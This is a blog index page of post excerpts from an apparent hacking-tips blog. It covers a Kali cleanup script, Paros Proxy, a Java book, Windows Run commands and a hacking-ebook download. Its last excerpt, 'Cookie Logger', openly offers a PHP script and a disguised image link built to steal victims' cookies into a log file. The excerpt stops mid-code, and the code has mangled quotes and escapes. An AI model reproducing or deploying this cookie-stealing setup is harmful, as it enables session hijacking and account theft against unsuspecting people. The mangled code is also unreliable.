Skip to main content

Posts

Little cleaner for Kali linux

--------------------------------------------------------------------------------------------------------------------------- Little cleaner for Kali linux. Clean apt cache. Removing old config files. Removing old kernels. Emptying every trashes. You can save script on Desktop. Make it executable and clean kali linux. Ex: root@kali:~/Desktop# ./kali_cleaner.sh Download  

Paros Proxy

Paros Proxy is a Java application (also included in Backtrack) that comes as a .jar file, which means it can run on any operating system, provided you have the latest java runtime (1.4x) installed. Moreover, Paros Proxy has a lot of features; it analysis HTTP message structure, renders HTML content in responses as it would appear in the browser, it has the ability to display and edit messaged in text and hexadecimal form. It allows the automatic updating of the HTTP Content-Length header following any manual editing of message contents. We are not able to show you all the usage of this app but we will try to focus on one function: To start using the tool Paros Proxy, one the proxy port has been set in your browser, simply double clicking the .jar file, and then start the browser and enter the URL that needs testing. For the purposes of this article we will be using http://demote.tesfire.net/ The site map, which is visible in Paros Proxy under the Sites tab, should then show the...

Java in 60 minutes A day ..

Java in 60 minutes A day .. ---------------------------------------------   Unlike other books like Java in 21 days, this is an excellent book that I found when I was a beginner in java. He tells it so easily and also he covers in depth.This is simple the best java beginner books I have ever seen.This is not only for beginners but also for those who want to know in depth.     1. Shows readers how to use Java to harness the power of object-oriented programming     2. Includes thirty one-hour lessons that recreate a typical week-long introductory seminar     3. Focuses on the Java 2 Platform, Enterprise Edition (J2EE)     4. Helps readers to develop skills that are critical to many Web services scenarios     5. The author was one of the first Sun Certified Instructors and has since taught Java to thousands of developers     6. Companion Web site features an online presentation by the aut...

Download 50+ Hacking Ebooks Collection.

  Download & Enjoy . ... Download

ShortCut CommandsIn Windows..

Type the following commands in your Run Box (Windows Key + R) or Start Run. ---------------------------------- devmgmt.msc = Device Manage msinfo32 = System Information cleanmgr = Disk Cleanup ntbackup = Backup or Restore Wizard (Windows Backup Utility) mmc = Microsoft Management Console excel = Microsoft Excel (If Installed) msaccess = Microsoft Access (If Installed) powerpnt = Microsoft PowerPoint (If Installed) winword = Microsoft Word (If Installed) frontpg = Microsoft FrontPage (If Installed) notepad = Notepad wordpad = WordPad calc = Calculator msmsgs = Windows Messenger mspaint = Microsoft Paint wmplayer = Windows Media Player rstrui = System Restore netscp6 = Netscape 6.x netscp = Netscape 7.x netscape = Netscape 4.x waol = America Online control = Opens the Control Panel control printers = Opens the Printers Dialog mstsc = Remote Desktop Connection cmd=Command Prompt

Top 20 Most Popular Programming

Top 20 Most Popular Programming. ---------------------------------- Languages Among Hacker:- ► Python ►Ruby ►JavaScript ►C 966 ►C# ►PHP Java ►C++ ►Haskell ►Clojure 458 ►CoffeeScript ►Objective C Lisp ►Perl ►Scala ►Scheme ►Other ►Erlang ►Lua ►SQL They are the top numbers that hackers tend to use to hack any systems in the world.

Cookie Logger

         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary...